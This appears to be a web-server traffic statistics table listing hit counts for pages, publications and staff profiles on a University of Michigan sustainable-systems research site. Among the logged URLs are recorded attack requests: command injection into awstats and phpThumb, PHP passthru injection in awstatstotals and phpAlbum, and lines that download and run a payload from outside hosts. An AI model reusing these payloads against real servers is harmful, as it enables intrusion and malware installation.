| 39 | 0.00 | 0.02% | /person/timothy-haines | |
| 39 | 0.00 | 0.02% | /person/scott-j-moura | |
| 39 | 0.00 | 0.02% | /person/eric-arons | |
| 39 | 0.02 | 0.04% | 0.02% | /css_doc/CSS04-10.pdf |
| 39 | 0.00 | 0.02% | /person/james-c-bean | |
| 39 | 0.00 | 0.02% | /publication/renewable-energy-willow-biomass-crops-life-cycle-energy-environmental-and-economic-perfo | |
| 39 | 0.00 | 0.02% | /project/plastic-recycling-automobiles | |
| 39 | 0.00 | 0.02% | /person/julie-bateman | |
| 39 | 0.00 | 0.02% | /facts/sponsors.html | |
| 38 | 0.05 | 0.10% | 0.02% | /css_doc/CSS09-10.pdf |
| 38 | 0.00 | 0.02% | /css_doc/intro.pdf | |
| 38 | 0.00 | 0.02% | /person/daniel-cox | |
| 38 | 0.00 | 0.02% | /person/tanya-chu | |
| 38 | 0.00 | 0.02% | /project/21st-century-wastewater-treatment-issues-ballast-water-and-endocrine-disruptor-chemicals-edc | |
| 38 | 0.00 | 0.02% | /project/life-cycle-assessment-stonyfield-farm-product-delivery-system | |
| 38 | 0.00 | 0.02% | /person/shunzhi-qian | |
| 38 | 0.00 | 0.02% | /person/david-l-gard | |
| 38 | 0.00 | 0.02% | /node/68 | |
| 38 | 0.00 | 0.02% | /person/mojitaba-moji-navvab | |
| 38 | 0.00 | 0.02% | /publication/life-cycle-design-guidance-manual-environmental-requirements-and-product-system | |
| 38 | 0.00 | 0.02% | /person/malcolm-l-hegeman | |
| 38 | 0.00 | 0.02% | /person/andrew-fang | |
| 37 | 0.00 | 0.02% | /person/kim-f-hayes | |
| 37 | 0.00 | 0.02% | /person/walter-mcmanus | |
| 37 | 0.00 | 0.02% | /person/joseph-colett | |
| 37 | 0.00 | 0.02% | /person/hyung-chul-kim | |
| 37 | 0.00 | 0.02% | /person/erin-trainor | |
| 37 | 0.00 | 0.02% | /publication/diversifying-options-household-mobility-reducing-vehicle-energy-consumption-capacity-mat | |
| 37 | 0.00 | 0.02% | /publication/modeling-life-cycle-energy-and-environmental-performance-amorphous-silicon-bipv-roofing- | |
| 37 | 0.00 | 0.02% | /event/mothers-more-meeting-sustainable-living | |
| 37 | 0.00 | 0.02% | /person/t-swenson | |
| 37 | 0.00 | 0.02% | /person/michael-lepech | |
| 37 | 0.00 | 0.02% | /person/hua-cai | |
| 37 | 0.00 | 0.02% | /publication/demand-analysis-and-optimization-renewable-energy-sustainable-rural-electrification-mban | |
| 37 | 0.00 | 0.02% | /person/holly-lynch | |
| 37 | 0.00 | 0.02% | /person/anne-shishkovsky | |
| 37 | 0.00 | 0.02% | /publication/waste-reduction-childrens-day-care-case-study-report-gretchens | |
| 37 | 0.00 | 0.02% | /WetWeather | |
| 37 | 0.00 | 0.02% | /project/sustainable-building-indicators-based-national-sustainable-building-workshop | |
| 37 | 0.00 | 0.02% | /person/zhongjing-ma | |
| 36 | 0.00 | 0.02% | /publication/steelcase-green-product-development-early-stage-life-cycle-analysis-tool-and-methodology | |
| 36 | 0.00 | 0.02% | /lco_residential_ac | |
| 36 | 0.00 | 0.02% | /project/life-cycle-optimization-residential-air-conditioning-replacement | |
| 36 | 0.00 | 0.02% | /project/avedas-product-distribution-system-strategic-assessment-greenhouse-gas-emissions-energy-cons | |
| 36 | 0.00 | 0.02% | /person/remi-b-coulon | |
| 36 | 0.00 | 0.02% | /person/darby-e-grande | |
| 36 | 0.00 | 0.02% | /publication/dynamic-pricing-tariffs-dte%E2%80%99s-residential-electricity-customers | |
| 36 | 0.00 | 0.02% | /person/chenchen-ouyang | |
| 36 | 0.00 | 0.02% | http://css.snre.umich.edu/css_doc/CSS05-05.pdf | |
| 36 | 0.00 | 0.02% | /publication/assessing-sustainability-us-food-system-life-cycle-perspective | |
| 36 | 0.00 | 0.02% | http://css.snre.umich.edu/css_doc/CSS08-15.pdf | |
| 36 | 0.00 | 0.02% | /facts/dalailama.html | |
| 36 | 0.00 | 0.02% | /person/rosina-m-bierbaum | |
| 36 | 0.00 | 0.02% | /person/sharada-gundala-machiroutu | |
| 36 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Ryan_Smith.jpg | |
| 36 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/individual_views/person/Greg-Keoleian.jpg | |
| 36 | 0.00 | 0.02% | /event/mi-h2objective-conference-research-shaping-michigans-water-future | |
| 35 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/page_view/ifa_upload/DanaDoor.jpg | |
| 35 | 0.00 | 0.02% | /publication/css-factsheets-u-m-waste-management-and-recycling | |
| 35 | 0.00 | 0.02% | /event/open-house-cs-mott-childrens-hospital | |
| 35 | 0.00 | 0.02% | /project/charting-course-sustainability-aurora-organic-dairy-phase-1-energy-and-carbon-footprint-anal | |
| 35 | 0.00 | 0.02% | /person/dan-wilson | |
| 35 | 0.00 | 0.02% | /person/deepak-sivaraman | |
| 35 | 0.00 | 0.02% | /node/56 | |
| 35 | 0.00 | 0.02% | /person/mark-p-everson | |
| 35 | 0.00 | 0.02% | /event/webinar-life-cycle-analysis-tools-and-applications-sustainability-american-institute-chemical- | |
| 35 | 0.00 | 0.02% | /person/nicholas-gutschow | |
| 34 | 0.00 | 0.02% | /publication/analysis-avoided-carbon-dioxide-due-photovoltaic-and-wind-turbine-technologies-displacin | |
| 34 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Erica_Green.jpg | |
| 34 | 0.00 | 0.02% | /project/charting-course-sustainability-aurora-organic-dairy-%25E2%2580%2593-phase-iii-developing-prototype-corpora | |
| 34 | 0.00 | 0.02% | /project/life-cycle-based-indicators-sustainable-agriculture | |
| 34 | 0.00 | 0.02% | /story/ford-motor-company-fund-engineering-sustainable-systems-fellowship | |
| 34 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Nathan_MacPherson.jpg | |
| 34 | 0.00 | 0.02% | /project/sustainability-assessment-and-reporting-university-michigan-ann-arbor-campus | |
| 34 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Aaron_Camere.jpg | |
| 34 | 0.00 | 0.02% | /person/michaela-t-zint | |
| 34 | 0.00 | 0.02% | /publication/life-cycle-assessment-pc-25-stationary-fuel-cell-system-providing-guide-environmental-im | |
| 34 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/individual_views/person/jarod.jpg | |
| 34 | 0.00 | 0.02% | /person/scott-noesen | |
| 34 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Jarett_Diamond.jpg | |
| 34 | 0.00 | 0.02% | /publication/vehicle-capacity-and-fuel-consumption-household-fleets-constraint-based-micro-simulation | |
| 34 | 0.07 | 0.15% | 0.02% | /css_doc/CSS10-03.pdf |
| 34 | 0.00 | 0.02% | /project/life-cycle-optimization-household-refrigerator-freezer-replacement | |
| 34 | 0.00 | 0.02% | /person/michael-h-mazor | |
| 34 | 0.00 | 0.02% | /project/ultralight-steel-autobody-advanced-vehicle-concept-life-cycle-inventory-study | |
| 34 | 0.00 | 0.02% | /project/thermal-gasification-solid-waste | |
| 33 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Ajay_Varadharajan.jpg | |
| 33 | 0.00 | 0.02% | /project/life-cycle-analysis-residential-home-michigan | |
| 33 | 0.00 | 0.02% | /person/danielle-lefevre | |
| 33 | 0.00 | 0.02% | /0_1_index.htm | |
| 33 | 0.00 | 0.02% | /project/life-cycle-optimization-vehicle-replacement | |
| 33 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Meredith_Neely.jpg | |
| 33 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/George Mitchell_0.jpg | |
| 33 | 0.00 | 0.02% | /css_doc/Ch2.pdf | |
| 33 | 0.00 | 0.02% | /project/renewable-energy-assessment-bhp-billiton | |
| 33 | 0.00 | 0.02% | /publication/parameters-affecting-life-cycle-performance-pv-technologies-and-systems | |
| 33 | 0.00 | 0.02% | /person/hyung-ju-kim | |
| 33 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Erin_Trainor.jpg | |
| 33 | 0.00 | 0.02% | /project/development-sustainable-shrimp-aquaculture | |
| 33 | 0.00 | 0.02% | /person/carey-bylin | |
| 33 | 0.00 | 0.02% | /person/meredith-fowlie | |
| 33 | 0.00 | 0.02% | /person/andres-f-clarens | |
| 32 | 0.00 | 0.02% | /person/guntra-aistars | |
| 32 | 0.00 | 0.02% | /3_2_Undergrad.htm | |
| 32 | 0.00 | 0.02% | /person/andy-winkelman | |
| 32 | 0.00 | 0.02% | /person/james-j-winebrake | |
| 32 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Daniel_Cox.jpg | |
| 32 | 0.00 | 0.02% | /publication/life-cycle-approach-product-system-design | |
| 32 | 0.00 | 0.02% | /project/state-michigan-greenhouse-gas-inventory-0 | |
| 32 | 0.00 | 0.02% | /assets/Sax_Wege_lecture2002.pdf | |
| 32 | 0.00 | 0.02% | /person/carol-e-girata | |
| 32 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Andrew_Heairet.jpg | |
| 32 | 0.00 | 0.02% | /content/js_add_more/publication/field_keywords | |
| 32 | 0.00 | 0.01% | 0.02% | /css_doc/CSS06-13.pdf |
| 32 | 0.00 | 0.02% | /node/add/publication | |
| 32 | 0.00 | 0.02% | /project/ann-arbor-material-flow-analysis | |
| 32 | 0.00 | 0.02% | /person/laura-podzikowski | |
| 32 | 0.00 | 0.01% | 0.02% | /css_doc/CSS99-09.pdf |
| 32 | 0.00 | 0.02% | /3_3_Internship.htm | |
| 32 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Joseph_colett.jpg | |
| 32 | 0.00 | 0.02% | /person/galina-churkina | |
| 32 | 0.01 | 0.01% | 0.02% | /css_doc/CSS08-20.pdf |
| 32 | 0.00 | 0.02% | /project/analyzing-options-accelerating-transition-efficient-vehicles-carbon-market-context | |
| 32 | 0.00 | 0.02% | /publication/life-cycle-environmental-performance-and-improvement-yogurt-product-delivery-system | |
| 32 | 0.00 | 0.02% | /person/hilton-clark | |
| 31 | 0.00 | 0.01% | 0.02% | /css_doc/CSS02-01.pdf |
| 31 | 0.00 | 0.02% | /project/product-and-process-design-life-cycle-risk-reduction-and-environmental-impact-mitigation | |
| 31 | 0.00 | 0.02% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Nolan_Orfield.jpg | |
| 31 | 0.00 | 0.02% | /person/mike-edison | |
| 31 | 0.00 | 0.02% | /publication/life-cycle-assessment-willow-bioenergy-cropping-system | |
| 31 | 0.00 | 0.02% | /project/interdisciplinary-research-and-education-industrial-ecology | |
| 31 | 0.00 | 0.02% | /project/efri-resin-final-project-summary-multi-scale-design-and-control-framework-dynamically-couple | |
| 31 | 0.00 | 0.02% | /person/chunbo-ma | |
| 31 | 0.00 | 0.02% | /project/effect-water-level-changes-great-lakes-coastal-wetlands | |
| 31 | 0.00 | 0.02% | /person/william-levine | |
| 31 | 0.00 | 0.02% | /person/kimberly-mueller | |
| 31 | 0.00 | 0.02% | /person/melissa-k-vernon | |
| 31 | 0.00 | 0.02% | /publication/sustainable-agriculture-development-farm-assessment-tool | |
| 31 | 0.00 | 0.02% | /person/wenting-sun | |
| 31 | 0.00 | 0.02% | /about/contact | |
| 31 | 0.00 | 0.02% | /person/colin-mcmillan | |
| 31 | 0.00 | 0.02% | /person/sergio-pacca | |
| 31 | 0.00 | 0.02% | /person/elizabeth-lillard | |
| 31 | 0.00 | 0.01% | 0.02% | /css_doc/CSS01-09.pdf |
| 31 | 0.00 | 0.02% | /person/jimin-zhao | |
| 31 | 0.00 | 0.02% | /publication/avedas-product-distribution-system-strategic-assessment-greenhouse-gas-emissions-and-ene | |
| 31 | 0.00 | 0.02% | /0_0_menu.htm | |
| 31 | 0.00 | 0.02% | /person/mary-ann-curran | |
| 31 | 0.00 | 0.02% | /node/31 | |
| 31 | 0.00 | 0.02% | /project/life-cycle-design-building-integrated-photovoltaic-systems | |
| 31 | 0.00 | 0.02% | /person/vanessa-smith-riedemann | |
| 31 | 0.01 | 0.02% | 0.02% | /css_doc/CSS95-05_ExecSum.pdf |
| 31 | 0.00 | 0.02% | /publication/life-cycle-design-milk-and-juice-packaging | |
| 31 | 0.00 | 0.02% | /publication/life-cycle-design-air-intake-manifolds-phase-ii-lower-plenum-54-l-f-250-air-intake-manif | |
| 31 | 0.00 | 0.02% | /person/bernie-fischlowitz-roberts | |
| 31 | 0.00 | 0.02% | /publication/sustainability-assessment-and-reporting-university-michigans-ann-arbor-campus | |
| 31 | 0.00 | 0.02% | /publication/overview-chinas-water-resources | |
| 30 | 0.00 | 0.01% | /publication/resource-management-implications-large-scale-organic-dairy-us-life-cycle-perspective | |
| 30 | 0.00 | 0.01% | /publication/css-factsheets-personal-transportation | |
| 30 | 0.00 | 0.01% | /project/life-cycle-assessment-enhancing-product-environmental-performance | |
| 30 | 0.00 | 0.01% | /publication/life-cycle-assessment-33kw-photovoltaic-system-dana-building-university-michigan-thin-fi | |
| 30 | 0.00 | 0.01% | http://css.snre.umich.edu/css_doc/CSS04-14.pdf | |
| 30 | 0.00 | 0.01% | /publication/ecotourism-north-america-applied-implications-irwin-lodge | |
| 30 | 0.00 | 0.01% | /publication/leed-energy-performance-modeling-and-evaluation-st-dana-building-renovations | |
| 30 | 0.00 | 0.01% | /publication/impact-battery-sizing-stochastic-optimal-power-management-plug-hybrid-electric-vehicles | |
| 30 | 0.00 | 0.01% | /publication/life-cycle-greenhouse-gas-emissions-embodied-production-trade-and-consumption-primary-al | |
| 30 | 0.00 | 0.01% | /person/amit-kapur | |
| 30 | 0.00 | 0.01% | /person/amy-samples | |
| 30 | 0.00 | 0.01% | /person/daniel-g-brown | |
| 30 | 0.00 | 0.01% | /person/jaymie-meliker | |
| 30 | 0.00 | 0.01% | /person/alphonse-anderson | |
| 30 | 0.00 | 0.01% | /publication/css-factsheets-us-wastewater-treatment-system | |
| 30 | 0.00 | 0.01% | /publication/carbon-abatement-photovoltaic-pv-electricity-margin | |
| 30 | 0.00 | 0.01% | /publication/contemporary-cement-cycle-united-states | |
| 30 | 0.00 | 0.01% | /person/christina-sadler | |
| 30 | 0.00 | 0.01% | /person/peter-arbuckle | |
| 30 | 0.00 | 0.01% | /project/flat-panel-displays-environmental-assessment-and-improvement | |
| 29 | 0.00 | 0.01% | /person/laura-flanigan | |
| 29 | 0.00 | 0.01% | /person/robert-h-abrams | |
| 29 | 0.00 | 0.01% | /person/juliette-commoy | |
| 29 | 0.00 | 0.01% | /project/practical-application-measuring-sustainability-ben-jerrys-dairy-suppliers | |
| 29 | 0.00 | 0.01% | /publication/css-factsheets-us-food-system | |
| 29 | 0.00 | 0.01% | /person/dov-brachfeld | |
| 29 | 0.00 | 0.01% | /project/life-cycle-modeling-and-improvement-united-technologies-purecell-200-power-system | |
| 29 | 0.00 | 0.01% | /node/69 | |
| 29 | 0.00 | 0.01% | /publication/wet-weather-rules-regulations-and-policies-national-survey | |
| 29 | 0.00 | 0.01% | /person/marc-jensen-melaina | |
| 29 | 0.00 | 0.01% | /publication/tools-and-implementation-framework-environmental-cost-accounting | |
| 29 | 0.00 | 0.01% | /person/ria-berns | |
| 29 | 0.00 | 0.01% | /publication/dynamic-life-cycle-assessment-tool-comparing-bridge-deck-designs | |
| 29 | 0.00 | 0.01% | /person/julie-z-zimmerman | |
| 29 | 0.00 | 0.01% | /project/livable-communities-through-sustainable-transportation | |
| 29 | 0.13 | 0.28% | 0.01% | /css_doc/CSS02-02.pdf |
| 29 | 0.00 | 0.01% | /publication/dynamic-modeling-material-stocks-case-study-cement-flows-united-states | |
| 29 | 0.00 | 0.01% | /project/product-environmental-profiles-steelcase | |
| 29 | 0.00 | 0.01% | /publication/guidance-improving-life-cycle-design-and-management-milk-packaging | |
| 29 | 0.00 | 0.01% | /project/alcoa-foundations-conservation-and-sustainability-fellowship-program-enabling-technology-sus | |
| 29 | 0.00 | 0.01% | /person/sarah-cashman | |
| 29 | 0.00 | 0.01% | /person/bernhard-dietz | |
| 29 | 0.00 | 0.01% | /person/michael-sadowski | |
| 29 | 0.00 | 0.01% | /person/jeremy-stoll | |
| 29 | 0.00 | 0.01% | /publication/life-cycle-based-sustainability-metrics | |
| 28 | 0.00 | 0.01% | /publication/css-factsheets-social-development-indicators | |
| 28 | 0.00 | 0.01% | /person/nathan-arbitman | |
| 28 | 0.00 | 0.01% | /publication/pollution-prevention-through-life-cycle-design | |
| 28 | 0.00 | 0.01% | /publication/life-cycle-energy-and-emissions-municipal-water-and-wastewater-services-case-studies-tre | |
| 28 | 0.00 | 0.01% | /publication/life-cycle-optimization-residential-air-conditioning-replacement | |
| 28 | 0.00 | 0.01% | /research/researchareas/projects | |
| 25 | 0.00 | 0.01% | /research/researchareas/projects?tid=7 | |
| 28 | 0.00 | 0.01% | /event/using-national-household-travel-survey-data-transportation-decision-making-workshop | |
| 28 | 0.00 | 0.01% | /person/dan-menerey | |
| 28 | 0.00 | 0.01% | /person/sina-sadeghi-baghsorkhi | |
| 28 | 0.00 | 0.01% | /publication/life-cycle-assessment-office-furniture-products-final-report-study-three-steelcase-offic | |
| 28 | 0.00 | 0.01% | /publication/life-cycle-optimization-residential-clothes-washer-replacement | |
| 28 | 0.00 | 0.01% | /publication/disposable-vs-reusable-systems-two-source-reduction-case-studies | |
| 28 | 0.00 | 0.01% | /publication/integrated-life-cycle-assessment-and-life-cycle-analysis-model-pavement-overlay-systems | |
| 28 | 0.00 | 0.01% | 0.01% | /css_doc/CSS06-12.pdf |
| 28 | 0.00 | 0.01% | /publication/preliminary-life-cycle-analysis-modular-and-conventional-housing-benton-harbor-mi | |
| 28 | 0.00 | 0.01% | /person/richard-bole | |
| 28 | 0.00 | 0.01% | /project/collaborative-research-implications-greenhouse-gas-policy-instruments-material-flows-life-cy | |
| 28 | 0.00 | 0.01% | /publication/life-cycle-optimization-household-refrigerator-freezer-replacement | |
| 28 | 0.00 | 0.01% | /person/shinji-isono | |
| 28 | 0.00 | 0.01% | /taxonomy/term/5/all | |
| 28 | 0.00 | 0.01% | /publication/life-cycle-design-framework-and-demonstration-projects-profiles-att-and-alliedsignal | |
| 28 | 0.00 | 0.01% | /project/integrating-resource-assessment-economics-and-public-policy-optimize-renewable-electricity-g | |
| 28 | 0.00 | 0.01% | /person/lidia-p-kostyniuk | |
| 28 | 0.00 | 0.01% | /publication/critical-compilation-henrys-law-constant-temperature-dependence-relations-organic-compou | |
| 27 | 0.00 | 0.01% | /person/richard-denbow | |
| 27 | 0.00 | 0.01% | /publication/life-cycle-design-att-demonstration-project | |
| 27 | 0.00 | 0.01% | /publications/favorites | |
| 27 | 0.00 | 0.01% | /publication/css-factsheets-green-it | |
| 27 | 0.00 | 0.01% | /project/application-and-refinement-bees-building-environmental-and-economic-sustainability-enhancing | |
| 27 | 0.00 | 0.01% | /person/mary-anne-carroll | |
| 27 | 0.00 | 0.01% | /person/peter-bailey | |
| 27 | 0.00 | 0.01% | /person/wendy-rigterink | |
| 27 | 0.00 | 0.01% | /project/epa-internship-u-m-sustainable-systems-internship-program | |
| 27 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/individual_views/person/ming_xu.jpg | |
| 27 | 0.00 | 0.01% | /publication/product-life-cycle-assessment-reduce-health-risks-and-environmental-impacts | |
| 27 | 0.00 | 0.01% | /publication/life-cycle-energy-and-environmental-performance-new-university-building-modeling-challen | |
| 27 | 0.00 | 0.01% | /sites/css.snre.umich.edu/files/imagecache/individual_views/person/Bulkley.jpg | |
| 27 | 0.00 | 0.01% | /publication/wet-weather-benchmarking-report | |
| 27 | 0.00 | 0.01% | /project/development-steelcase-wood-products-manufacturing-division-environmental-performance | |
| 27 | 0.00 | 0.01% | /project/energy-performance-proposedongoing-dana-building-renovations | |
| 27 | 0.00 | 0.01% | /publication/geologic-vs-geographic-constraints-cement-resources | |
| 27 | 0.00 | 0.01% | /project/evaluation-leed-leadership-energy-and-environmental-design-%0Busing-life-cycle-assessment-year | |
| 27 | 0.00 | 0.01% | /project/benchmarking-current-states-wet-weather-discharge-policies | |
| 27 | 0.00 | 0.01% | /taxonomy/term/3 | |
| 27 | 0.00 | 0.01% | /project/technology-assessment-and-evaluation-nextenergy-zone-microgrid-system | |
| 27 | 0.00 | 0.01% | /person/emily-mazure | |
| 27 | 0.00 | 0.01% | /person/nicole-labutong | |
| 27 | 0.00 | 0.01% | /person/masayuki-kanzaki | |
| 27 | 0.00 | 0.01% | /project/renewable-energy-biomass | |
| 27 | 0.00 | 0.01% | /css_doc/CSS99-10.pdf | |
| 27 | 0.00 | 0.01% | /person/jon-dettling | |
| 27 | 0.00 | 0.01% | /event/11th-annual-mayors-green-fair | |
| 26 | 0.00 | 0.01% | /publication/life-cycle-approach-sustainable-agriculture-indicators | |
| 26 | 0.00 | 0.01% | /publication/css-factsheets-biodiversity | |
| 26 | 0.00 | 0.01% | /event/michigan-china-clean-tech-2010 | |
| 26 | 0.00 | 0.01% | /publication/life-cycle-environmental-and-economic-impacts-%E2%80%98cash-clunkers%E2%80%99 | |
| 26 | 0.00 | 0.01% | /publication/application-life-cycle-assessment-and-design-tools-instrument-panels-analysis-common-sen | |
| 26 | 0.00 | 0.01% | /publication/css-factsheets-us-environmental-footprint | |
| 26 | 0.00 | 0.01% | /publication/material-design-sustainability-through-life-cycle-modeling-engineered-cementitious-compo | |
| 26 | 0.00 | 0.01% | /publication/css-factsheets-residential-buildings | |
| 26 | 0.00 | 0.01% | /publication/css-factsheets-biofuels | |
| 26 | 0.00 | 0.01% | /event/campus-energy-management-ip-network-feasibility-study-achieving-energy-efficiency-energywise | |
| 26 | 0.00 | 0.01% | /event/2011-annual-technology-forum-us-china-clean-vehicle-consortium/ | |
| 26 | 0.00 | 0.01% | /project/further-analysis-energy-security-clean-energy-technologies | |
| 26 | 0.00 | 0.01% | /publication/life-cycle-assessment-plastic-and-steel-vehicle-fuel-tanks | |
| 26 | 0.00 | 0.01% | /person/joseph-malcoun | |
| 26 | 0.00 | 0.01% | /project/cleaner-products-through-life-cycle-design-fuel-tank | |
| 26 | 0.00 | 0.01% | /person/jonathan-forrester | |
| 26 | 0.00 | 0.01% | /person/chris-w-scheuer | |
| 26 | 0.00 | 0.01% | /publication/css-factsheets-us-municipal-solid-waste | |
| 26 | 0.00 | 0.01% | /person/david-c-shen | |
| 26 | 0.00 | 0.01% | /person/brian-katzman | |
| 26 | 0.00 | 0.01% | /person/w-ross-morrow | |
| 26 | 0.00 | 0.01% | /person/brendan-held | |
| 26 | 0.00 | 0.01% | /project/energy-utilization-wastewater-treatment-facilities | |
| 26 | 0.00 | 0.01% | /publication/pavement-asset-management-and-optimization-model-informing-policy-and-enhancing-sustaina | |
| 26 | 0.00 | 0.01% | /person/sarah-popp | |
| 26 | 0.02 | 0.05% | 0.01% | /css_doc/CSS91-03.pdf |
| 26 | 0.00 | 0.01% | /person/elyse-steiner | |
| 26 | 0.00 | 0.01% | /person/alan-phipps | |
| 26 | 0.00 | 0.01% | /person/mia-costic | |
| 26 | 0.00 | 0.01% | /person/blair-wilcox | |
| 26 | 0.00 | 0.01% | /event/how-liberia-will-get-its-groove-back-writing-story-electrification-through-agent-based-modelin | |
| 26 | 0.00 | 0.01% | /person/kate-elliott | |
| 26 | 0.00 | 0.01% | /person/amy-kolodzy | |
| 25 | 0.01 | 0.01% | 0.01% | /css_doc/CSS08-16.pdf |
| 25 | 0.00 | 0.01% | /cgi/awstats/awstats.pl | |
| 25 | 0.00 | 0.01% | /cgi/awstats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 25 | 0.00 | 0.01% | /person/han-zhang | |
| 25 | 0.00 | 0.01% | /publication/carbon-emission-targets-driving-sustainable-mobility-us-light-duty-vehicles | |
| 25 | 0.00 | 0.01% | /person/allie-schafer | |
| 25 | 0.00 | 0.01% | /publication/sustainable-pavement-asset-management-based-life-cycle-models-and-optimization-methods | |
| 25 | 0.00 | 0.01% | /publication/css-factsheets-wind-energy | |
| 25 | 0.00 | 0.01% | /project/integration-lifecycle-and-macroeconomic-analysis | |
| 25 | 0.00 | 0.01% | /publication/greenhouse-gas-emissions-payback-and-economic-assessment-lightweighted-vehicles-using-al | |
| 25 | 0.00 | 0.01% | /awstats/awstats.pl | |
| 25 | 0.00 | 0.01% | /awstats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 25 | 0.00 | 0.01% | /person/mindy-murch | |
| 25 | 0.00 | 0.01% | /project/tools-and-implementation-framework-environmental-cost-accounting | |
| 25 | 0.00 | 0.01% | /person/ben-nicholson | |
| 25 | 0.00 | 0.01% | /publication/concrete-infrastructure-sustainability-life-cycle-metrics-material-design-and-optimized- | |
| 25 | 0.00 | 0.01% | /scgi-bin/awstats.pl | |
| 25 | 0.00 | 0.01% | /scgi-bin/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo| | |
| 25 | 0.00 | 0.01% | /publication/pv-bidpat-evaluation-and-design-tool-building-integrated-photovoltaic-installations | |
| 25 | 0.00 | 0.01% | /project/cleaner-products-through-life-cycle-design-surfacing-film | |
| 25 | 0.00 | 0.01% | /person/tony-baptista | |
| 25 | 0.00 | 0.01% | /taxonomy/term/1 | |
| 25 | 0.00 | 0.01% | /project/transition-issues-developing-hydrogen-infrastructure-fuel-cell-vehicles-scenario-based-asses | |
| 25 | 0.00 | 0.01% | /project/muses-sustainable-infrastructure-materials-and-systems-integration-microstructure-tailoring- | |
| 25 | 0.01 | 0.01% | 0.01% | /css_doc/ProjectNarrative.pdf |
| 25 | 0.00 | 0.01% | /project/city-ann-arbor-energy-flow-analysis | |
| 25 | 0.00 | 0.01% | /publication/life-cycle-design-criteria-engine-oil-filters-allied-signal-case-study | |
| 25 | 0.00 | 0.01% | /publication/life-cycle-design-fuel-tank-system | |
| 25 | 0.00 | 0.01% | /publication/css-factsheets-photovoltaic-energy | |
| 25 | 0.00 | 0.01% | /publication/industrial-ecology-automobile-life-cycle-perspective | |
| 25 | 0.00 | 0.01% | /publication/motown-microgrid-life-cycle-analysis-rates-energy-and-environmental-performance | |
| 25 | 0.00 | 0.01% | /person/akshay-kumar | |
| 25 | 0.00 | 0.01% | /publication/css-factsheets-us-cities | |
| 25 | 0.00 | 0.01% | 0.01% | /css_doc/CSS06-15.pdf |
| 25 | 0.00 | 0.01% | /person/chelsea-ransom | |
| 25 | 0.00 | 0.01% | /css_doc/none.htm | |
| 25 | 0.00 | 0.01% | /person/sanne-h-knudsen | |
| 24 | 0.00 | 0.01% | /stat/awstatstotals.php | |
| 24 | 0.00 | 0.01% | /stat/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}} | |
| 24 | 0.00 | 0.01% | /project/cleaner-products-through-life-cycle-design-amorphous-silicon-photovoltaics | |
| 24 | 0.00 | 0.01% | /publication/stochastic-optimal-control-approach-power-management-plug-hybrid-electric-vehicles | |
| 24 | 0.00 | 0.01% | /project/pollution-prevention-cirriculum-development-chemistry | |
| 24 | 0.00 | 0.01% | /apps/phpalbum/main.php | |
| 24 | 0.00 | 0.01% | /apps/phpalbum/main.php?cmd=setquality&var1=1'.passthru('id').'; | |
| 24 | 0.00 | 0.01% | /publication/sustainable-development-design-review-life-cycle-design-and-related-approaches | |
| 24 | 0.00 | 0.01% | /project/development-sustainability-management-framework-university-michigan-housing-division | |
| 24 | 0.00 | 0.01% | /awstats/awstatstotals.php | |
| 24 | 0.00 | 0.01% | /awstats/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}} | |
| 24 | 0.00 | 0.01% | /awstatstotals/awstatstotals.php | |
| 24 | 0.00 | 0.01% | /awstatstotals/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}} | |
| 24 | 0.00 | 0.01% | /publication/evaluation-life-cycle-cost-analysis-practices-used-michigan-department-transportation | |
| 24 | 0.00 | 0.01% | /phpalbum/main.php | |
| 24 | 0.00 | 0.01% | /phpalbum/main.php?cmd=setquality&var1=1'.passthru('id').'; | |
| 24 | 0.00 | 0.01% | /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php | |
| 14 | 0.00 | 0.01% | /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 | |
| 10 | 0.00 | /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 | ||
| 24 | 0.00 | 0.01% | /project/life-cycle-assessment-e-publishing-and-digital-libraries-linking-industrial-ecology-research | |
| 24 | 0.00 | 0.01% | /event/reflections-great-lakes | |
| 24 | 0.00 | 0.01% | /publication/application-life-cycle-assessment-design | |
| 24 | 0.00 | 0.01% | /event/earth-day-reflections | |
| 24 | 0.00 | 0.01% | /person/lewis-garvin | |
| 24 | 0.00 | 0.01% | /person/steve-blanchard | |
| 24 | 0.00 | 0.01% | /publication/michigan-greenhouse-gas-inventory-1990-and-2002 | |
